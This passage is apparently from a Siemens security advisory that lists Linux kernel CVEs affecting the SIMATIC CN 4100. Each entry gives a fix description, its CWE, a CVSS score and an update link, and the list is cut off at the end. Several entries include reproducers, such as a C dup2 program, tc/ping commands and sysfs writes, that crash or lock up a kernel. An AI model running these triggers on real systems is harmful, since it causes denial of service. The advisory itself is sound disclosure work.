Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39742

In the Linux kernel, the following vulnerability has been resolved:

RDMA: hfi1: fix possible divide-by-zero in find_hw_thread_mask()

The function divides number of online CPUs by num_core_siblings, and later checks the divider by zero. This implies a possibility to get a divide-by-zero runtime error. Fix it by moving the check prior to division. This also helps to save one indentation level.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-369 Divide By Zero
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39743

In the Linux kernel, the following vulnerability has been resolved:

jfs: truncate good inode pages when hard link is 0

The fileset value of the inode copy from the disk by the reproducer is AGGR_RESERVED_I. When executing evict, its hard link number is 0, so its inode pages are not truncated. This causes the bugon to be triggered when executing clear_inode() because nrpages is greater than 0.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39749

In the Linux kernel, the following vulnerability has been resolved:

rcu: Protect ->defer_qs_iw_pending from data race

On kernels built with CONFIG_IRQ_WORK=y, when rcu_read_unlock() is invoked within an interrupts-disabled region of code [1], it will invoke rcu_read_unlock_special(), which uses an irq-work handler to force the system to notice when the RCU read-side critical section actually ends. That end won't happen until interrupts are enabled at the soonest.

In some kernels, such as those booted with rcutree.use_softirq=y, the irq-work handler is used unconditionally.

The per-CPU rcu_data structure's ->defer_qs_iw_pending field is updated by the irq-work handler and is both read and updated by rcu_read_unlock_special().
This resulted in the following KCSAN splat:

    ------------------------------------------------------------------------
    BUG: KCSAN: data-race in rcu_preempt_deferred_qs_handler / rcu_read_unlock_special

    read to 0xffff96b95f42d8d8 of 1 bytes by task 90 on cpu 8:
      rcu_read_unlock_special+0x175/0x260
      __rcu_read_unlock+0x92/0xa0
      rt_spin_unlock+0x9b/0xc0
      __local_bh_enable+0x10d/0x170
      __local_bh_enable_ip+0xfb/0x150
      rcu_do_batch+0x595/0xc40
      rcu_cpu_kthread+0x4e9/0x830
      smpboot_thread_fn+0x24d/0x3b0
      kthread+0x3bd/0x410
      ret_from_fork+0x35/0x40
      ret_from_fork_asm+0x1a/0x30

    write to 0xffff96b95f42d8d8 of 1 bytes by task 88 on cpu 8:
      rcu_preempt_deferred_qs_handler+0x1e/0x30
      irq_work_single+0xaf/0x160
      run_irq_workd+0x91/0xc0
      smpboot_thread_fn+0x24d/0x3b0
      kthread+0x3bd/0x410
      ret_from_fork+0x35/0x40
      ret_from_fork_asm+0x1a/0x30

    no locks held by irq_work/8/88.
    irq event stamp: 200272
    hardirqs last enabled at (200272): [] finish_task_switch+0x131/0x320
    hardirqs last disabled at (200271): [] __schedule+0x129/0xd70
    softirqs last enabled at (0): [] copy_process+0x4df/0x1cc0
    softirqs last disabled at (0): [] 0x0
    ------------------------------------------------------------------------

The problem is that irq-work handlers run with interrupts enabled, which means that rcu_preempt_deferred_qs_handler() could be interrupted, and that interrupt handler might contain an RCU read-side critical section, which might invoke rcu_read_unlock_special(). In the strict KCSAN mode of operation used by RCU, this constitutes a data race on the ->defer_qs_iw_pending field.

This commit therefore disables interrupts across the portion of the rcu_preempt_deferred_qs_handler() that updates the ->defer_qs_iw_pending field. This suffices because this handler is not a fast path.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39752

In the Linux kernel, the following vulnerability has been resolved:

ARM: rockchip: fix kernel hang during smp initialization

In order to bring up secondary CPUs, the main CPU writes trampoline code to SRAM. The trampoline code is written while secondary CPUs are powered on (at least that is true for the RK3188 CPU). Sometimes that leads to a kernel hang. Probably because a secondary CPU executes trampoline code while the kernel doesn't expect it.

The patch moves the SRAM initialization step to the point where all secondary CPUs are powered down.

That fixes rare hangs on RK3188:

    [ 0.091568] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000
    [ 0.091996] rockchip_smp_prepare_cpus: ncores 4

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-364 Signal Handler Race Condition
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39756

In the Linux kernel, the following vulnerability has been resolved:

fs: Prevent file descriptor table allocations exceeding INT_MAX

When sysctl_nr_open is set to a very high value (for example, 1073741816 as set by systemd), processes attempting to use file descriptors near the limit can trigger massive memory allocation attempts that exceed INT_MAX, resulting in a WARNING in mm/slub.c:

    WARNING: CPU: 0 PID: 44 at mm/slub.c:5027 __kvmalloc_node_noprof+0x21a/0x288

This
happens because kvmalloc_array() and kvmalloc() check if the requested size exceeds INT_MAX and emit a warning when the allocation is not flagged with __GFP_NOWARN.

Specifically, when nr_open is set to 1073741816 (0x3ffffff8) and a process calls dup2(oldfd, 1073741880), the kernel attempts to allocate:
- File descriptor array: 1073741880 * 8 bytes = 8,589,935,040 bytes
- Multiple bitmaps: ~400MB
- Total allocation size: > 8GB (exceeding INT_MAX = 2,147,483,647)

Reproducer:
1. Set /proc/sys/fs/nr_open to 1073741816:
   # echo 1073741816 > /proc/sys/fs/nr_open

2. Run a program that uses a high file descriptor:
   #include <unistd.h>
   #include <sys/resource.h>

   int main() {
       struct rlimit rlim = {1073741824, 1073741824};
       setrlimit(RLIMIT_NOFILE, &rlim);
       dup2(2, 1073741880); // Triggers the warning
       return 0;
   }

3. Observe WARNING in dmesg at mm/slub.c:5027

systemd commit a8b627a introduced automatic bumping of fs.nr_open to the maximum possible value. The rationale was that systems with memory control groups (memcg) no longer need separate file descriptor limits since memory is properly accounted. However, this change overlooked that:

1. The kernel's allocation functions still enforce INT_MAX as a maximum size regardless of memcg accounting
2. Programs and tests that legitimately test file descriptor limits can inadvertently trigger massive allocations
3. The resulting allocations (>8GB) are impractical and will always fail

systemd's algorithm starts with INT_MAX and keeps halving the value until the kernel accepts it. On most systems, this results in nr_open being set to 1073741816 (0x3ffffff8), which is just under 1GB of file descriptors.

While processes rarely use file descriptors near this limit in normal operation, certain selftests (like tools/testing/selftests/core/unshare_test.c) and programs that test file descriptor limits can trigger this issue.

Fix this by adding a check in alloc_fdtable() to ensure the requested allocation size does not exceed INT_MAX.
This causes the operation to fail with -EMFILE instead of triggering a kernel warning and avoids the impractical >8GB memory allocation request.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39757

In the Linux kernel, the following vulnerability has been resolved:

ALSA: usb-audio: Validate UAC3 cluster segment descriptors

UAC3 class segment descriptors need to be verified whether their sizes match with the declared lengths and whether they fit with the allocated buffer sizes, too. Otherwise malicious firmware may lead to the unexpected OOB accesses.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7.1, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2025-39759

In the Linux kernel, the following vulnerability has been resolved:

btrfs: qgroup: fix race between quota disable and quota rescan ioctl

There's a race between a task disabling quotas and another running the rescan ioctl that can result in a use-after-free of qgroup records from the fs_info->qgroup_tree rbtree.
This happens as follows:

1) Task A enters btrfs_ioctl_quota_rescan() -> btrfs_qgroup_rescan();

2) Task B enters btrfs_quota_disable() and calls btrfs_qgroup_wait_for_completion(), which does nothing because at that point fs_info->qgroup_rescan_running is false (it wasn't set yet by task A);

3) Task B calls btrfs_free_qgroup_config() which starts freeing qgroups from fs_info->qgroup_tree without taking the lock fs_info->qgroup_lock;

4) Task A enters qgroup_rescan_zero_tracking() which starts iterating the fs_info->qgroup_tree tree while holding fs_info->qgroup_lock, but task B is freeing qgroup records from that tree without holding the lock, resulting in a use-after-free.

Fix this by taking fs_info->qgroup_lock at btrfs_free_qgroup_config(). Also at btrfs_qgroup_rescan() don't start the rescan worker if quotas were already disabled.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39760

In the Linux kernel, the following vulnerability has been resolved:

usb: core: config: Prevent OOB read in SS endpoint companion parsing

usb_parse_ss_endpoint_companion() checks descriptor type before length, enabling a potentially odd read outside of the buffer size.

Fix this up by checking the size first before looking at any of the fields in the descriptor.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39766

In the Linux kernel, the following vulnerability has been resolved:

net/sched: Make cake_enqueue return NET_XMIT_CN when past buffer_limit

The following setup can trigger a WARNING in htb_activate due to the condition: !cl->leaf.q->q.qlen

    tc qdisc del dev lo root
    tc qdisc add dev lo root handle 1: htb default 1
    tc class add dev lo parent 1: classid 1:1 \
        htb rate 64bit
    tc qdisc add dev lo parent 1:1 handle f: \
        cake memlimit 1b
    ping -I lo -f -c1 -s64 -W0.001 127.0.0.1

This is because the low memlimit leads to a low buffer_limit, which causes packet dropping. However, cake_enqueue still returns NET_XMIT_SUCCESS, causing htb_enqueue to call htb_activate with an empty child qdisc. We should return NET_XMIT_CN when packets are dropped from the same tin and flow.

I do not believe return value of NET_XMIT_CN is necessary for packet drops in the case of ack filtering, as that is meant to optimize performance, not to signal congestion.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39770

In the Linux kernel, the following vulnerability has been resolved:

net: gso: Forbid IPv6 TSO with extensions on devices with only IPV6_CSUM

When performing Generic Segmentation Offload (GSO) on an IPv6 packet that contains extension headers, the kernel incorrectly requests checksum offload if the egress device only advertises NETIF_F_IPV6_CSUM feature, which has a strict contract: it supports checksum offload only for plain TCP or UDP over IPv6 and explicitly does not support packets with extension headers.

The current GSO logic violates this contract by failing to disable the feature for packets with extension headers, such as those used in GREoIPv6 tunnels.

This violation results in the device being asked to perform an operation it cannot support, leading to a `skb_warn_bad_offload` warning and a collapse of network throughput. While device TSO/USO is correctly bypassed in favor of software GSO for these packets, the GSO stack must be explicitly told not to request checksum offload.

Mask NETIF_F_IPV6_CSUM, NETIF_F_TSO6 and NETIF_F_GSO_UDP_L4 in gso_features_check if the IPv6 header contains extension headers to compute checksum in software.

The exception is a BIG TCP extension, which, as stated in commit 68e068cabd2c6c53 ("net: reenable NETIF_F_IPV6_CSUM offload for BIG TCP packets"): "The feature is only enabled on devices that support BIG TCP TSO. The header is only present for PF_PACKET taps like tcpdump, and not transmitted by physical devices."
kernel log output (truncated):

    WARNING: CPU: 1 PID: 5273 at net/core/dev.c:3535 skb_warn_bad_offload+0x81/0x140
    ...
    Call Trace:
      skb_checksum_help+0x12a/0x1f0
      validate_xmit_skb+0x1a3/0x2d0
      validate_xmit_skb_list+0x4f/0x80
      sch_direct_xmit+0x1a2/0x380
      __dev_xmit_skb+0x242/0x670
      __dev_queue_xmit+0x3fc/0x7f0
      ip6_finish_output2+0x25e/0x5d0
      ip6_finish_output+0x1fc/0x3f0
      ip6_tnl_xmit+0x608/0xc00 [ip6_tunnel]
      ip6gre_tunnel_xmit+0x1c0/0x390 [ip6_gre]
      dev_hard_start_xmit+0x63/0x1c0
      __dev_queue_xmit+0x6d0/0x7f0
      ip6_finish_output2+0x214/0x5d0
      ip6_finish_output+0x1fc/0x3f0
      ip6_xmit+0x2ca/0x6f0
      ip6_finish_output+0x1fc/0x3f0
      ip6_xmit+0x2ca/0x6f0
      inet6_csk_xmit+0xeb/0x150
      __tcp_transmit_skb+0x555/0xa80
      tcp_write_xmit+0x32a/0xe90
      tcp_sendmsg_locked+0x437/0x1110
      tcp_sendmsg+0x2f/0x50
    ...

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-573 Improper Following of Specification by Caller
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39772

In the Linux kernel, the following vulnerability has been resolved:

drm/hisilicon/hibmc: fix the hibmc loaded failed bug

When hibmc loaded failed, the driver
uses hibmc_unload to free the resource, but the mutexes in mode.config are not initialized, which will access a NULL pointer. Just change goto statement to return, because hibnc_hw_init() doesn't need to free anything.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39773

In the Linux kernel, the following vulnerability has been resolved:

net: bridge: fix soft lockup in br_multicast_query_expired()

When multicast_query_interval is set to a large value, the local variable 'time' in br_multicast_send_query() may overflow. If the time is smaller than jiffies, the timer will expire immediately, and then call mod_timer() again, which creates a loop and may trigger the following soft lockup issue.

    watchdog: BUG: soft lockup - CPU#1 stuck for 221s! [rb_consumer:66]
    CPU: 1 UID: 0 PID: 66 Comm: rb_consumer Not tainted 6.16.0+ #259 PREEMPT(none)
    Call Trace:
      __netdev_alloc_skb+0x2e/0x3a0
      br_ip6_multicast_alloc_query+0x212/0x1b70
      __br_multicast_send_query+0x376/0xac0
      br_multicast_send_query+0x299/0x510
      br_multicast_query_expired.constprop.0+0x16d/0x1b0
      call_timer_fn+0x3b/0x2a0
      __run_timers+0x619/0x950
      run_timer_softirq+0x11c/0x220
      handle_softirqs+0x18e/0x560
      __irq_exit_rcu+0x158/0x1a0
      sysvec_apic_timer_interrupt+0x76/0x90

This issue can be reproduced with:

    ip link add br0 type bridge
    echo 1 > /sys/class/net/br0/bridge/multicast_querier
    echo 0xffffffffffffffff > /sys/class/net/br0/bridge/multicast_query_interval
    ip link set dev br0 up

The multicast_startup_query_interval can also cause this issue.
Similar to the commit 99b40610956a ("net: bridge: mcast: add and enforce query interval minimum"), add check for the query interval maximum to fix this issue.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-667 Improper Locking
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39776

In the Linux kernel, the following vulnerability has been resolved:

mm/debug_vm_pgtable: clear page table entries at destroy_args()

The mm/debug_vm_pagetable test allocates manually page table entries for the tests it runs, using also its manually allocated mm_struct. That in itself is ok, but when it exits, at destroy_args() it fails to clear those entries with the *_clear functions.

The problem is that leaves stale entries. If another process allocates an mm_struct with a pgd at the same address, it may end up running into the stale entry. This is happening in practice on a debug kernel with CONFIG_DEBUG_VM_PGTABLE=y, for example this is the output with some extra debugging I added (it prints a warning trace if pgtables_bytes goes negative, in addition to the warning at check_mm() function):

    [ 2.539353] debug_vm_pgtable: [get_random_vaddr ]: random_vaddr is 0x7ea247140000
    [ 2.539366] kmem_cache info
    [ 2.539374] kmem_cachep 0x000000002ce82385 - freelist 0x0000000000000000 - offset 0x508
    [ 2.539447] debug_vm_pgtable: [init_args ]: args->mm is 0x000000002267cc9e
    (...)
[ 2.552800] WARNING: CPU: 5 PID: 116 at include/linux/mm.h:2841 free_pud_range+0x8bc/0x8d0
[ 2.552816] Modules linked in:
[ 2.552843] CPU: 5 UID: 0 PID: 116 Comm: modprobe Not tainted 6.12.0-105.debug_vm2.el10.ppc64le+debug #1 VOLUNTARY
[ 2.552859] Hardware name: IBM,9009-41A POWER9 (architected) 0x4e0202 0xf000005 of:IBM,FW910.00 (VL910_062) hv:phyp pSeries
[ 2.553170] NIP [c0000000007eef3c] free_pud_range+0x8bc/0x8d0
[ 2.553185] LR [c0000000007eef30] free_pud_range+0x8b0/0x8d0
[ 2.553199] Call Trace:
[ 2.553207] [c0000000622e7650] [c0000000007eef30] free_pud_range+0x8b0/0x8d0 (unreliable)
[ 2.553229] [c0000000622e7750] [c0000000007f40b4] free_pgd_range+0x284/0x3b0
[ 2.553248] [c0000000622e7800] [c0000000007f4630] free_pgtables+0x450/0x570
[ 2.553274] [c0000000622e78e0] [c0000000008161c0] exit_mmap+0x250/0x650
[ 2.553292] [c0000000622e7a30] [c0000000001b95b8] __mmput+0x98/0x290
[ 2.558344] [c0000000622e7a80] [c0000000001d1018] exit_mm+0x118/0x1b0
[ 2.558361] [c0000000622e7ac0] [c0000000001d141c] do_exit+0x2ec/0x870
[ 2.558376] [c0000000622e7b60] [c0000000001d1ca8] do_group_exit+0x88/0x150
[ 2.558391] [c0000000622e7bb0] [c0000000001d1db8] sys_exit_group+0x48/0x50
[ 2.558407] [c0000000622e7be0] [c00000000003d810] system_call_exception+0x1e0/0x4c0
[ 2.558423] [c0000000622e7e50] [c00000000000d05c] system_call_vectored_common+0x15c/0x2ec
(...)
[ 2.558892] ---[ end trace 0000000000000000 ]---
[ 2.559022] BUG: Bad rss-counter state mm:000000002267cc9e type:MM_ANONPAGES val:1
[ 2.559037] BUG: non-zero pgtables_bytes on freeing mm: -6144

Here the modprobe process ended up with an allocated mm_struct from the mm_struct slab that was used before by the debug_vm_pgtable test. That is not a problem, since the mm_stru ---truncated---

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39782
In the Linux kernel, the following vulnerability has been resolved:

jbd2: prevent softlockup in jbd2_log_do_checkpoint()

Both jbd2_log_do_checkpoint() and jbd2_journal_shrink_checkpoint_list() periodically release j_list_lock after processing a batch of buffers to avoid long hold times on the j_list_lock. However, since both functions contend for j_list_lock, the combined time spent waiting and processing can be significant.

jbd2_journal_shrink_checkpoint_list() explicitly calls cond_resched() when need_resched() is true to avoid softlockups during prolonged operations. But jbd2_log_do_checkpoint() only exits its loop when need_resched() is true, relying on potentially sleeping functions like __flush_batch() or wait_on_buffer() to trigger rescheduling. If those functions do not sleep, the kernel may hit a softlockup.
watchdog: BUG: soft lockup - CPU#3 stuck for 156s! [kworker/u129:2:373]
CPU: 3 PID: 373 Comm: kworker/u129:2 Kdump: loaded Not tainted 6.6.0+ #10
Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.27 06/13/2017
Workqueue: writeback wb_workfn (flush-7:2)
pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : native_queued_spin_lock_slowpath+0x358/0x418
lr : jbd2_log_do_checkpoint+0x31c/0x438 [jbd2]
Call trace:
native_queued_spin_lock_slowpath+0x358/0x418
jbd2_log_do_checkpoint+0x31c/0x438 [jbd2]
__jbd2_log_wait_for_space+0xfc/0x2f8 [jbd2]
add_transaction_credits+0x3bc/0x418 [jbd2]
start_this_handle+0xf8/0x560 [jbd2]
jbd2__journal_start+0x118/0x228 [jbd2]
__ext4_journal_start_sb+0x110/0x188 [ext4]
ext4_do_writepages+0x3dc/0x740 [ext4]
ext4_writepages+0xa4/0x190 [ext4]
do_writepages+0x94/0x228
__writeback_single_inode+0x48/0x318
writeback_sb_inodes+0x204/0x590
__writeback_inodes_wb+0x54/0xf8
wb_writeback+0x2cc/0x3d8
wb_do_writeback+0x2e0/0x2f8
wb_workfn+0x80/0x2a8
process_one_work+0x178/0x3e8
worker_thread+0x234/0x3b8
kthread+0xf0/0x108
ret_from_fork+0x10/0x20

So explicitly call cond_resched() in jbd2_log_do_checkpoint() to avoid softlockup.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39783
In the Linux kernel, the following vulnerability has been resolved:

PCI: endpoint: Fix configfs group list head handling

Doing a list_del() on the epf_group field of struct pci_epf_driver in pci_epf_remove_cfs() is not correct as this field is a list head, not a list entry.
This list_del() call triggers a KASAN warning when an endpoint function driver which has a configfs attribute group is torn down:

==================================================================
BUG: KASAN: slab-use-after-free in pci_epf_remove_cfs+0x17c/0x198
Write of size 8 at addr ffff00010f4a0d80 by task rmmod/319

CPU: 3 UID: 0 PID: 319 Comm: rmmod Not tainted 6.16.0-rc2 #1 NONE
Hardware name: Radxa ROCK 5B (DT)
Call trace:
show_stack+0x2c/0x84 (C)
dump_stack_lvl+0x70/0x98
print_report+0x17c/0x538
kasan_report+0xb8/0x190
__asan_report_store8_noabort+0x20/0x2c
pci_epf_remove_cfs+0x17c/0x198
pci_epf_unregister_driver+0x18/0x30
nvmet_pci_epf_cleanup_module+0x24/0x30 [nvmet_pci_epf]
__arm64_sys_delete_module+0x264/0x424
invoke_syscall+0x70/0x260
el0_svc_common.constprop.0+0xac/0x230
do_el0_svc+0x40/0x58
el0_svc+0x48/0xdc
el0t_64_sync_handler+0x10c/0x138
el0t_64_sync+0x198/0x19c
...

Remove this incorrect list_del() call from pci_epf_remove_cfs().

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1, Base Score 7.8, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39787
In the Linux kernel, the following vulnerability has been resolved:

soc: qcom: mdt_loader: Ensure we don't read past the ELF header

When the MDT loader is used in remoteproc, the ELF header is sanitized beforehand, but that's not necessarily the case for other clients.

Validate the size of the firmware buffer to ensure that we don't read past the end as we iterate over the header. e_phentsize and e_shentsize are validated as well, to ensure that the assumptions about step size in the traversal are valid.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39788
In the Linux kernel, the following vulnerability has been resolved:

scsi: ufs: exynos: Fix programming of HCI_UTRL_NEXUS_TYPE

On Google gs101, the number of UTP transfer request slots (nutrs) is 32, and in this case the driver ends up programming the UTRL_NEXUS_TYPE incorrectly as 0.

This is because the left hand side of the shift is 1, which is of type int, i.e. 31 bits wide. Shifting by more than that width results in undefined behaviour.

Fix this by switching to the BIT() macro, which applies correct type casting as required. This ensures the correct value is written to UTRL_NEXUS_TYPE (0xffffffff on gs101), and it also fixes a UBSAN shift warning:

UBSAN: shift-out-of-bounds in drivers/ufs/host/ufs-exynos.c:1113:21
shift exponent 32 is too large for 32-bit type 'int'

For consistency, apply the same change to the nutmrs / UTMRL_NEXUS_TYPE write.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39790
In the Linux kernel, the following vulnerability has been resolved:

bus: mhi: host: Detect events pointing to unexpected TREs

When a remote device sends a completion event to the host, it contains a pointer to the consumed TRE.
The host uses this pointer to process all of the TREs between it and the host's local copy of the ring's read pointer. This works when processing completion for chained transactions, but can lead to nasty results if the device sends an event for a single-element transaction with a read pointer that is multiple elements ahead of the host's read pointer. For instance, if the host accesses an event ring while the device is updating it, the pointer inside of the event might still point to an old TRE. If the host uses the channel's xfer_cb() to directly free the buffer pointed to by the TRE, the buffer will be double-freed. This behavior was observed on an ep that used upstream EP stack without 'commit 6f18d174b73d ("bus: mhi: ep: Update read pointer only after buffer is written")'. Where the device updated the events ring pointer before updating the event contents, so it left a window where the host was able to access the stale data the event pointed to, before the device had the chance to update them. The usual pattern was that the host received an event pointing to a TRE that is not immediately after the last processed one, so it got treated as if it was a chained transaction, processing all of the TREs in between the two read pointers. This commit aims to harden the host by ensuring transactions where the event points to a TRE that isn't local_rp + 1 are chained. 
[mani: added stable tag and reworded commit message]

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-415 Double Free
Metrics: CVSS Version 3.1, Base Score 6.7, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39794
In the Linux kernel, the following vulnerability has been resolved:

ARM: tegra: Use I/O memcpy to write to IRAM

Kasan crashes the kernel trying to check boundaries when using the normal memcpy.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 7.1, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2025-39795
In the Linux kernel, the following vulnerability has been resolved:

block: avoid possible overflow for chunk_sectors check in blk_stack_limits()

In blk_stack_limits(), we check that the t->chunk_sectors value is a multiple of the t->physical_block_size value.

However, by finding the chunk_sectors value in bytes, we may overflow the unsigned int which holds chunk_sectors, so change the check to be based on sectors.

Affected Products: Siemens SIMATIC. Vendor: Siemens. Product Version: SIMATIC CN 4100. Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-674 Uncontrolled Recursion
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39798
In the Linux kernel, the following vulnerability has been resolved:

NFS: Fix the setting of capabilities when automounting a new filesystem

